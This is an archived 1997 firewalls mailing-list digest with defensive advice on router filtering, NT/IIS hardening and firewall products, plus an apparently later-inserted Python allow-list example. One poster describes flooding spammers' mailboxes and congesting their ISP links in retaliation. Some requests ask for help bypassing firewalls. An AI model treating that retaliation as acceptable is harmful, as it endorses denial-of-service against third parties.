>forth, as well as any packets bearing one of your internal IP addresses,
>as a source address, especially if these are going INTO your protected
>network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
>any ports that your users will not be using, and leave just mail, web,
>ftp, etc.
>
>ricardo
>ralvarado@avantel.com.mx
>
>

From firewalls-owner Wed Jan 8 23:59:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24983 for firewalls-outgoing; Wed, 8 Jan 1997 22:55:10 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24964 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:56 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA08128 for ; Tue, 7 Jan 1997 13:07:50 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id NAA18072; Tue, 7 Jan 1997 13:06:34 -0800
Received: from cidexchange.infosel.com.mx(148.246.8.22) by mycroft via smap (V1.3mjr) id sma018063; Tue Jan 7 13:05:44 1997
Received: by cidexchange.infosel.com.mx with Microsoft Exchange (IMC 4.0.837.3) id <01BBFCAB.9DC681A0@cidexchange.infosel.com.mx>; Tue, 7 Jan 1997 15:01:09 -0600
Message-ID:
From: =?iso-8859-1?Q?Jaime_Alberto_Botello_Cant=FA?=
To: "'firewalls@GreatCircle.COM'"
Cc: "'matkoski@dreamscape.com'" , "'Ricardo Alvarado'"
Subject: RE: internal filtering router - filter config?
Date: Tue, 7 Jan 1997 15:01:03 -0600
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Steve,

It is very important to block any TCP traffic that comes with the established flag off. This is very important for example if you have intranets to protect, in this case for example, you want to allow internal users to access web servers outside, but you don't want outside users to access your intranet web, ftp, etc. Doing this you have to take some ftp things into consideration, you may need to use FTP passive connections for your internal users to access ftp servers outside.

Look, if you want more information you may get Building Internet Firewalls (O'Reilly & Associates) at www.greatcircle.com.

Hope this helps.

Jaime A Botello C
Departamento de Redes y Telecomunicaciones
Información Selectiva S.A. de C.V.
Calzada San Pedro #507
Colonia Fuentes del Valle, C.P. 66220
Tel: (528) 318-8943
Fax: (528) 318-8981
email: jbotello@infosel.com.mx

>
>
>-----Original Message-----
>From: Ricardo Alvarado [SMTP:ralvarado@avantel.com.mx]
>Sent: Viernes 3 de Enero de 1997 9:21 AM
>To: firewalls@GreatCircle.COM
>Subject: Re: internal filtering router - filter config?
>
>>What type of things would you filter on the internal router? or even
>>the external router? I am going to be installing a firewall real soon
>>and would really appreciate any help.
>>
>>-steve.
>>matkoski@dreamscape.com
>
>In your external router you'd block any ICMP traffic going back and
>forth, as well as any packets bearing one of your internal IP
>addresses,
>as a source address, especially if these are going INTO your protected
>network. Also, kill telnets, fingers, snmp and snmp trap. Actually,
>kill
>any ports that your users will not be using, and leave just mail, web,
>ftp, etc.
>
>ricardo
>ralvarado@avantel.com.mx
>

From firewalls-owner Thu Jan 9 02:14:15 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA07782 for firewalls-outgoing; Thu, 9 Jan 1997 01:57:53 -0800 (PST)
Received: from dicsmss1.jrc.it (dicsmss1.jrc.it [139.191.1.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA07773 for ; Thu, 9 Jan 1997 01:57:41 -0800 (PST)
Received: from ceo0912.jrc.it by dicsmss1.jrc.it (4.1/EB-950131-C) id AA03652; Thu, 9 Jan 97 11:03:03 +0100
Received: by ceo0912.jrc.it (SMI-8.6/SMI-SVR4) id KAA11431; Thu, 9 Jan 1997 10:53:28 +0100
Date: Thu, 9 Jan 1997 10:53:28 +0100
From: peter.maersk-moller@jrc.it (Peter Maersk-Moller)
Message-Id: <199701090953.KAA11431@ceo0912.jrc.it>
To: firewalls@GreatCircle.COM
Subject: Re: CheckRite Laser Checks!
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Md5: ywYJvmMVYLzlS7KBP1+GRQ==
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi firewall list subscribers.

This is not firewall related but it is firewall mailing list related.

There are probably a lot of people getting tired over these commercial offers mailed to you through mailing lists. Instead of trying to stop them how about allowing them, but advertise that the price for using them for distributing commercial offers is something like $100.000 or whatever will be too expensive. If a company then uses others' mailing list for commercial distribution they have to pay for the service, however you will probably need a court decision that allows you to charge a fee for companies using others' mailing list.

Does anybody know how the legal aspect of this is? I mean, there are a lot of services I will have to pay for if I use them. Is it legal for a company to use a service set up by me without paying for it? How do we create the legal grounds for charging companies that use other people's mailing lists for commercial junkmail distribution?
I used to trace down the sender of junkmail and filled their mailbox and congested their Internet connection or their ISP Internet connection. After that I usually used to find the bosses of those responsible for sending junkmail to explain how much damage their employees have brought to their companies, but it seems there are too many incompetent loonies in the world.

Regards
Peter Maersk-Moller
(Speaking for myself and nobody else)

From firewalls-owner Thu Jan 9 05:44:32 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA13574 for firewalls-outgoing; Thu, 9 Jan 1997 05:37:44 -0800 (PST)
Received: from ram-exch-ns1.ramstein (ram-exch-ns1.ramstein.af.mil [132.25.130.19]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA13567 for ; Thu, 9 Jan 1997 05:37:29 -0800 (PST)
Received: by ram-exch-ns1.ramstein with Microsoft Exchange (IMC 4.0.837.3) id <01BBFE3A.C164AF20@ram-exch-ns1.ramstein>; Thu, 9 Jan 1997 14:38:18 +0100
Message-ID:
From: Franke Albert 2 Lt USAFE CSS/SCBS
To: "'firewalls@GreatCircle.com'"
Subject: TCP WRAPPERS FOR DEC ALPHA RUNNING NT 4.0???
Date: Thu, 9 Jan 1997 14:38:16 +0100
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Thanks to everyone who responded to my last question. I got a lot of
>people who suggested using TCP Wrappers to add another layer of
>security. I did a lot of research (CERT etc), but only found TCP
>Wrappers for UNIX machines. Does anyone know where I can find a TCP
>Wrapper for a DEC Alpha (64 or 32 bit) running Windows NT 4.0? Thanks
>for your help.
>
>Albert E. Franke, 2Lt, USAF
>OIC, USAFE Web Tech Support 480-7905
>

From firewalls-owner Thu Jan 9 06:29:51 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15381 for firewalls-outgoing; Thu, 9 Jan 1997 06:25:50 -0800 (PST)
Received: from relay-11.mail.demon.net (relay-11.mail.demon.net [194.217.242.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15374 for ; Thu, 9 Jan 1997 06:25:39 -0800 (PST)
Received: from martel.demon.co.uk ([158.152.221.102]) by relay-10.mail.demon.net id aa1017462; 9 Jan 97 14:02 GMT
Message-ID:
Date: Thu, 9 Jan 1997 10:24:42 +0000
To: firewalls@greatcircle.com
From: Ian Gresley-Jones
Subject: Re: packet filtering on PPP interfaces
In-Reply-To: <9701062217.AA04330@omsk.quadrix.com>
MIME-Version: 1.0
X-Mailer: Turnpike Version 3.00 <5FNnYA8I4VwTBaSmGLF2KtVCy5>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In article <9701062217.AA04330@omsk.quadrix.com>, BVE writes
>
>I figured that someone would've answered this one by now, but I haven't seen a
>message on the list....
>
> Is anyone aware of ppp implementation that include packet filtering? Or of
> (nit-based?) packet filtering implementations that could be applied to a
> ppp interface under Solaris 1 (Solaris 1.2 to be exact)?
>
>I once set up Morningstar PPP (on SunOs 4.1.3u1) to protect a small Unix box
>from the Internet. It was a while ago, so I don't remember all the details,
>but it provided what (at the time) seemed like a fairly good set of features,
>for that type of software. It was pretty simple to configure....
>
>I don't know if it's good enough for your needs, but it's a place to start....
>

I'd definitely recommend looking at Morningstar - you can get various docs from the Web/ftp site (either www.morningstar.com or the site referred to from there because the company was bought out late last year I believe). The filtering facilities are good and they've implemented many other options like CHAP authentication etc. Costs about USD750 IIRC. You can get a one month free trial. Go for it!

Regards
Ian

#include
I have no association with Morningstar or the current vendor of this product.

********************************************************************
* Ian Gresley-Jones                                      ZZR600    *
*                                                                  *
********************************************************************

From firewalls-owner Thu Jan 9 06:46:18 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15576 for firewalls-outgoing; Thu, 9 Jan 1997 06:30:27 -0800 (PST)
Received: from exp2.is.xpark.pmh.org (exphub.is.xpark.pmh.org [198.215.78.104]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15569 for ; Thu, 9 Jan 1997 06:30:08 -0800 (PST)
Received: from localhost by exp2.is.xpark.pmh.org (AIX 3.2/UCB 5.64/4.03) id AA22045; Thu, 9 Jan 1997 08:22:20 -0600
Message-Id: <32D4FF1B.6956@exphub.pmh.org>
Date: Thu, 09 Jan 1997 08:22:19 -0600
From: "Cary Conover(IS) 13897"
Organization: Parkland Memorial Hospital
X-Mailer: Mozilla 3.01Gold (X11; I; AIX 2)
Mime-Version: 1.0
To: Chris Pugrud
Cc: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list
Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!!
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Chris Pugrud wrote:
>
> This really is not as bad of a situation as it seems. Here are a few
> pointers to vastly increasing the security of the system. This is not
> the be all or end all of security. I am sure that there are more steps
> that you can take to increase your security even more. Buyer Beware.
> Your mileage may vary...
>
> Apply sp2 for Windows NT 4.0
> SP2 fixes several bugs in the OS and IIS
> http://www.microsoft.com/ntserversupport/Default-SL.HTM
>
> The machine really should be used only for serving web pages. If you
If you > can dedicate a singular machine, even a 486, to just tossing HTTP then > you can greatly increase the security. > Under Control Panel > Services, Only the following MUST be running for > a web server: > EventLog > FTP Publishing Service (optional) > Plug and Play (NT 4.0) > Workstation > World Wide Web Publishing Service > Only these services should be set "Automatic". All other services > should be set "manual." Be careful, your mileage may vary... > > Use IIS security > IIS has some built in allow/deny filtering based on IP address > Internet Service Manager > WWW Service Properties > Advanced TAB > > CGI/BIN is BAD (by default) > Remove scripts and the HTML Administrator if installed > Internet Service Manager > Directories > Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all > others, especially any that you can not identify. > While you are there make sure to go to "logging" and set up logs > Also go c:\InetPub and set security > NT Explorer > C:\InetPub > right click > properties > security > > permissions > Replace Permissions on Subdirectories > Replace Permissions on Existing Files > Make Everyone Read (RX)(RX) > Make Administrator Full Control (All)(All) > Remove all others > This sets things up so that only the administrator can make changes > and they must be made from the machine. > > Use the OS security > NT 4.0 has basic packet filtering built in > Control Panel > Network > Protocols > TCP/IP > Properties > IP Address > > Advanced > Enable Security > Configure > Permit Only (TCP Ports) > Add > 80 (http) > Permit Only (UDP Ports) > (leave blank) > Permit Only (IP Protocols) > Add > 6 (TCP) > This really cuts down what the machine can do. If you need to surf > from the machine you may need to add 53 to UDP Ports. > While you in the control panel, also check your bindings: > Control Panel > Network > Bindings > Show Bindings for "all > protocols." 
> Make sure that "TCP/IP" is Enabled > Disable all others > Show bindings for "all adapters" > Expand the adapter (click the plus box) > Expand WINS Client > You may need to Enable Workstation If the networking will not start on > reboot > If you do, make sure to disable server and NetBIOS Interface > Restart your computer > > Good day and Good luck > > Chris > > >-----Original Message----- > >From: Franke Albert 2 Lt USAFE CSS/SCBS [SMTP:albert.franke@ramstein.af.mil] > >Sent: Wednesday, January 08, 1997 3:52 AM > >To: Firewalls Mailing list > >Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! > > > >I am responsible for securing (as well as I can) a DEC Alpha running > >Windows NT 4.0 and Internet Information Server as our WWW Server. It is > >sitting as a node on our LAN and everyone in the world can access it. I > >want a program that I can run on it that will allow/disallow blocks of > >IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but > >not as necessary) it to keep detailed logs. I have heard of O'Reiley's > >WebSite, but I don't know if this will do. I do not have funding for an > >expensive firewall machine, and it is impracticle to add routers into > >our LAN. Please help if you have any suggestions. Thanks. > > > >albert.franke@ramstein.af.mil > >Albert E. Franke, 2Lt, USAF > >OIC, USAFE Web Tech Support 480-7905 I don't know if you folks caught this or not. He is on a LAN on a fairly large Air Force Base in Germany. This means not only is his Website open to attack so are many of the bases computer systems. It appears that there are larger issues here than meet the eye. His Security Squadron should be involved as well as the Communications Squadron that is stationed on the base. With the military it takes a long while to get anything done unless you do it yourself on a shoe string. The money comes from above once a year in a budget process that is antiquated and very slow to adjust to change. 
This is one area that changes on as frequent as an hour to hour basis. There are initiatives going out from the Pentagon to do things about this and the President himself has even put out the word to Secure the Military Systems. However the priority in the field is not on Securing the Sites. It is on keeping the job they presently have. They are in the one mistake and your out of the game military. I wish Albert luck. Hopefully he can get the Base Commanders Attention so that the Comm Squadron will put in a Firewall at the access point to the internet on the base. Otherwise the whole base's security on their network is suspect. On the other hand there could be security in place and he just is not aware that it is there. Chances are the previous is the case. -- Cary From firewalls-owner Thu Jan 9 07:48:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17990 for firewalls-outgoing; Thu, 9 Jan 1997 07:31:18 -0800 (PST) Received: from whale.gu.kiev.ua (whale.gu.net [194.93.190.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA17952 for ; Thu, 9 Jan 1997 07:31:01 -0800 (PST) Received: from creator.gu.kiev.ua (root@creator.gu.kiev.ua [194.93.190.3]) by whale.gu.kiev.ua (8.7.5/8.7.3) with ESMTP id RAA58560 for ; Thu, 9 Jan 1997 17:30:36 +0200 Received: (from stesin@localhost) by creator.gu.kiev.ua id RAA02686 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:26:47 +0200 From: Andrew Stesin Message-Id: <199701091526.RAA02686@creator.gu.kiev.ua> Subject: Re: which mta 4 dmz To: firewalls@greatcircle.com Date: Thu, 9 Jan 1997 17:26:47 +0200 (EET) Reply-To: stesin@gu.kiev.ua In-Reply-To: <199701050519.AAA15351@exon.massart.mass.edu> from "Paonia Ezrine" at Jan 5, 97 00:19:56 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk | I am tring to deside which mta do use on the external mail machine. I am | thinking about these | 1. sendmail 8.8.4 | 2. 
zmailer 2.9.44.1
| 3. qmail 0.95
| 4. exim
5. SVR4.2 mail system (comes e.g. with SCO UnixWare 2.1.x)
| what are people using. What would you suggest? Pros/cons?

As for me, I know sendmail well, so I use it; but 5) seems to be an interesting alternative, too.

| thanks
| paonia

--
Best,
Andrew Stesin
nic-hdl: ST73-RIPE

From firewalls-owner Thu Jan 9 08:03:42 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18928 for firewalls-outgoing; Thu, 9 Jan 1997 07:51:22 -0800 (PST)
Received: from smtp-gw01.ny.us.ibm.net (smtp-gw01.ny.us.ibm.net [165.87.194.252]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA18909 for ; Thu, 9 Jan 1997 07:51:07 -0800 (PST)
Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id PAA21226 for ; Thu, 9 Jan 1997 15:50:42 GMT
Received: from slip139-92-81-170.ma.es.ibm.net(139.92.81.170) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smap6sDmb; Thu Jan 9 15:47:16 1997
Message-ID: <32D5122A.5290@ibm.net>
Date: Thu, 09 Jan 1997 16:43:38 +0100
From: Juan José Vázquez Rubio
X-Mailer: Mozilla 3.01 (Win95; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: cancel
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Please cancel...
jjvaz@ibm.net
Thanks

From firewalls-owner Thu Jan 9 08:31:05 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20329 for firewalls-outgoing; Thu, 9 Jan 1997 08:17:52 -0800 (PST)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA20313 for ; Thu, 9 Jan 1997 08:17:34 -0800 (PST)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id IAA19057 for ; Thu, 9 Jan 1997 08:19:38 -0800 (PST)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA21039; Thu, 9 Jan 97 08:16:50 PST
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id IAA23062 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Thu, 9 Jan 1997 08:16:30 -0800 (PST)
Message-Id: <199701091616.IAA23062@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id F947F90BA7A2D1A28825641A005993D1; Thu, 9 Jan 97 08:16:22 EDT
To: "Sean Miller"
Cc: firewalls
From: Ryan Russell/SYBASE
Date: 9 Jan 97 8:18:44 EDT
Subject: Re: Help in any of the following if at all possible
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hmm... getting in or out? :)

Ryan

---------- Previous Message ----------
To: firewalls
cc:
From: miller @ id.co.zw ("Sean Miller") @ smtp
Date: 01/07/97 04:05:01 PM
Subject: Help in any of the following if at all possible

I need some help in getting through firewalls (and, if anyone can, on getting through shells with restricted access or access denied). Please help.
Mark

From firewalls-owner Thu Jan 9 09:31:23 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA24070 for firewalls-outgoing; Thu, 9 Jan 1997 09:19:24 -0800 (PST)
Received: from trem.cnt.org.br (desvio.cnt.org.br [200.19.123.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA24051 for ; Thu, 9 Jan 1997 09:18:58 -0800 (PST)
Received: by trem.cnt.org.br (AIX 3.2/UCB 5.64/4.03) id AA11566; Thu, 9 Jan 1997 15:14:21 -0300
From: ormonde@trem.cnt.org.br (Rodrigo Ormonde)
Message-Id: <9701091814.AA11566@trem.cnt.org.br>
Subject: Re: internal filtering router - filter config?
To: firewalls@greatcircle.com
Date: Thu, 9 Jan 1997 15:14:20 -0300 (GRNLNDST)
In-Reply-To: from "Darren Cromer" at Jan 7, 97 06:41:49 am
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I too am setting up a screening firewall, but I want to allow pings to
> traverse the external router. (any advice on how to filter all ICMP
> except pings?)

It depends on which firewall you are using. Anyway, if you can filter ICMP packets by Type of Service, set up a filter that allows packets with Types of Service 0 and 8 (Echo request and Echo reply) to pass and blocks any other ICMP packets. Hope this helps.
--
Rodrigo de La Rocque Ormonde
e-mail: ormonde@cnt.org.br
PGP Public key: finger ormonde@cnt.org.br

From firewalls-owner Thu Jan 9 11:04:20 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29742 for firewalls-outgoing; Thu, 9 Jan 1997 10:56:35 -0800 (PST)
Received: from sirius.hkstar.com (sirius.hkstar.com [202.82.0.148]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA29734 for ; Thu, 9 Jan 1997 10:56:25 -0800 (PST)
Received: from default (uranus122.hkstar.com [202.82.51.122]) by sirius.hkstar.com (8.7.5/8.6.6) with ESMTP id CAA03347 for ; Fri, 10 Jan 1997 02:56:06 +0800 (HKT)
Message-Id: <199701091856.CAA03347@sirius.hkstar.com>
From: "Cyber Net-ghost"
To:
Subject: Where can i download the rainbow books ??
Date: Fri, 10 Jan 1997 03:06:55 +0800
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Where can I download the rainbow books? I want the full-length version of these books.... If you have them... please send them to me.... Thanks!! I am a student who is interested in hacking, but there are no people to teach me, and there is no "Hacker Group" in Hong Kong...... What should I do now?? Are there any hackers in Hong Kong???
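Going back to Albert Franke's question quoted in Cary's message above (allow only blocks such as 132.244 or hosts under .AF.MIL to reach the NT web server): the check itself is simple, but the domain half of it is the part people get wrong. A reverse (PTR) lookup is controlled by whoever owns the client's address space, so "this IP claims to be something.af.mil" proves nothing until you resolve that name forward and get the same address back. The following is an added example, not code from the original thread or from any product mentioned in it. The rule syntax mirrors the post (a bare dotted prefix such as "132.244" means the classful /16), the resolver is a constructed in-memory table so the example runs offline, and all hostnames and addresses in it are made up (RFC 5737 documentation ranges).

```python
"""Allow-list check for a web server: IP prefix rules plus DNS-suffix rules
with forward-confirmed reverse DNS (FCrDNS).  Added example; the resolver,
names and addresses are constructed for illustration."""
import ipaddress

# Rules written the way the original post writes them.
RULES = ["132.244", ".AF.MIL"]

# Constructed stand-in for DNS (assumption: a real deployment queries the
# resolver; every entry here is made up).
RESOLVER = {
    ("PTR", "198.51.100.5"): "web1.ramstein.af.mil",
    ("A", "web1.ramstein.af.mil"): ["198.51.100.5"],
    # The owner of 203.0.113.0/24 can put any name they like in their PTR
    # record.  The forward lookup of that name does not return 203.0.113.9,
    # so forward-confirmation fails and the client is not trusted.
    ("PTR", "203.0.113.9"): "proxy.ramstein.af.mil",
    ("A", "proxy.ramstein.af.mil"): ["198.51.100.77"],
}


def parse_rule(rule):
    """Turn one rule into a ("net", network) or ("suffix", str) matcher.

    "132.244"     -> 132.244.0.0/16  (8 bits per octet given; "132" -> /8)
    "10.1.2.0/24" -> explicit CIDR
    ".AF.MIL"     -> DNS suffix, matched case-insensitively
    """
    rule = rule.strip()
    if rule.startswith("."):
        return ("suffix", rule.lower())
    if "/" in rule:
        return ("net", ipaddress.ip_network(rule, strict=False))
    octets = rule.split(".")
    if not 1 <= len(octets) <= 4 or not all(o.isdigit() for o in octets):
        raise ValueError("bad rule: %r" % rule)
    padded = ".".join(octets + ["0"] * (4 - len(octets)))
    return ("net", ipaddress.ip_network("%s/%d" % (padded, 8 * len(octets)),
                                        strict=False))


def fcrdns_name(ip, resolver):
    """Forward-confirmed reverse DNS: ip -> name -> ips must contain ip.

    Returns the confirmed lower-case name, or None if there is no PTR record
    or the forward lookup does not confirm it."""
    ptr = resolver.get(("PTR", ip))
    if not ptr:
        return None
    ptr = ptr.lower()
    return ptr if ip in resolver.get(("A", ptr), []) else None


def is_allowed(client_ip, rules, resolver):
    """True if the client matches any prefix rule or any confirmed-name suffix rule."""
    addr = ipaddress.ip_address(client_ip)
    for kind, value in (parse_rule(r) for r in rules):
        if kind == "net" and addr in value:
            return True
        if kind == "suffix":
            name = fcrdns_name(client_ip, resolver)
            if name and name.endswith(value):
                return True
    return False


if __name__ == "__main__":
    for ip in ("132.244.17.3", "132.245.0.1", "198.51.100.5", "203.0.113.9"):
        print(ip, "allow" if is_allowed(ip, RULES, RESOLVER) else "deny")
```

Two caveats a practitioner would add: the suffix rule costs two DNS round-trips per new client, so cache the result per address; and an allow list on the web server protects only that one host, which is the larger point Cary makes about the rest of the base's LAN.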
From firewalls-owner Thu Jan 9 12:04:22 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA02178 for firewalls-outgoing; Thu, 9 Jan 1997 11:58:47 -0800 (PST)
Received: from umhsp02.umh.ac.be (umhsp02.umh.ac.be [193.190.192.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA02152 for ; Thu, 9 Jan 1997 11:58:33 -0800 (PST)
Received: from dialup23.mons.eunet.be by umhsp02.umh.ac.be (AIX 4.1/UCB 5.64/4.03) id AA15140; Thu, 9 Jan 1997 20:56:01 +0100
Message-Id: <3.0.32.19961231000008.007c65a0@umhsp02.umh.ac.be>
X-Sender: vdupont@umhsp02.umh.ac.be
X-Mailer: Windows Eudora Pro Version 3.0 Demo (32)
Date: Thu, 09 Jan 1997 20:57:23 +0100
To: firewalls@greatcircle.com
From: Vincent Dupont
Subject: What are the Best Firewall Products ?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Can someone help me with firewall products? "Firewalls" are new to me and I'm new on the GreatCircle mailing list... I have heard about these products: Raptor, Cycon, V-ONE, Digital firewall, ... Can you tell me about these products? I'm a student in computer science, and the purpose of my project this year is to "install a firewall" on the university network. I've read some documents about "constructing your firewall with a Linux box"... but I'm not a Linux expert... So, can someone help me to start in the "security world"... thanks.

Vincent Dupont.
From firewalls-owner Thu Jan 9 13:36:52 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA05752 for firewalls-outgoing; Thu, 9 Jan 1997 13:18:14 -0800 (PST)
Received: from snmpmgr.state.tn.us (snmpmgr.state.tn.us [170.142.1.74]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA05734 for ; Thu, 9 Jan 1997 13:17:55 -0800 (PST)
Received: from langate.tnet.state.tn.us by snmpmgr.state.tn.us with SMTP id AA07305 (5.67b/IDA-1.5 for ); Thu, 9 Jan 1997 15:17:14 -0600
Received: from tn01-Message_Server by langate.tnet.state.tn.us with Novell_GroupWise; Thu, 09 Jan 1997 15:17:58 -0600
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Thu, 09 Jan 1997 15:15:49 -0600
From: "Samuel T. Baker"
To: firewalls@GreatCircle.COM
Cc: bill.stout@hidata.com
Subject: Multi-FW Gateway management GUI -Reply
Mime-Version: 1.0
Content-Type: text/plain
Content-Disposition: inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I think you ought to include a high-level (I think like #1) GUI to monitor (either real-time or periodic display [<24 hrs] data) utilization/activity/traffic, with the ability to selectively drill down into a specific server/proxy/port/.... for more detailed statistics. This is certainly related to 14, but not the same. Some of this data would come from low-level processes in the OS, not necessarily the FWs, but it is intimately related to FW management.

HTH
Samuel Baker
. . . standard disclaimer . . .

>>> "Stout, Bill" 15:56 7 Jan1997 >>>
I'm collecting basic requirements for FW-farm management applications for an internal instructional document. What I've thought of so far is the following:

1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states.
[snip]
14. Load balancing?

Comments? Which are overkill and which should I add?
Bill Stout

From firewalls-owner Thu Jan 9 14:29:33 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA12588 for firewalls-outgoing; Thu, 9 Jan 1997 14:20:10 -0800 (PST)
Received: from california.sandia.gov (california.sandia.gov [146.246.250.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA12385 for ; Thu, 9 Jan 1997 14:19:27 -0800 (PST)
Received: from stealth.ran.sandia.gov (stealth.ran.sandia.gov [134.252.16.29]) by california.sandia.gov (8.8.4/1.15) with ESMTP id OAA17021 for ; Thu, 9 Jan 1997 14:19:06 -0800 (PST)
Received: from stealth.ran.sandia.gov (stealth.ran.sandia.gov [134.252.16.29]) by stealth.ran.sandia.gov (8.7.5/8.7.3) with SMTP id OAA00529 for ; Thu, 9 Jan 1997 14:10:28 -0800 (PST)
Date: Thu, 9 Jan 1997 14:10:27 -0800 (PST)
From: Phil Cox
To: firewalls@greatcircle.com
Subject: [INFO] Firewall monitoring tools != SNMP
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What tools (PD or Commercial) are available for monitoring a firewall for performance/availability from a remote station, while NOT using SNMP?

-Phil

* Philip C. Cox           | Quote of the Day:                        *
* pcox@sandia.gov         | "Character : the decisions a person      *
* PAGER: (510) 355-5222   | makes when the choice is not             *
* VOICE: (510) 294-3149   | obvious."
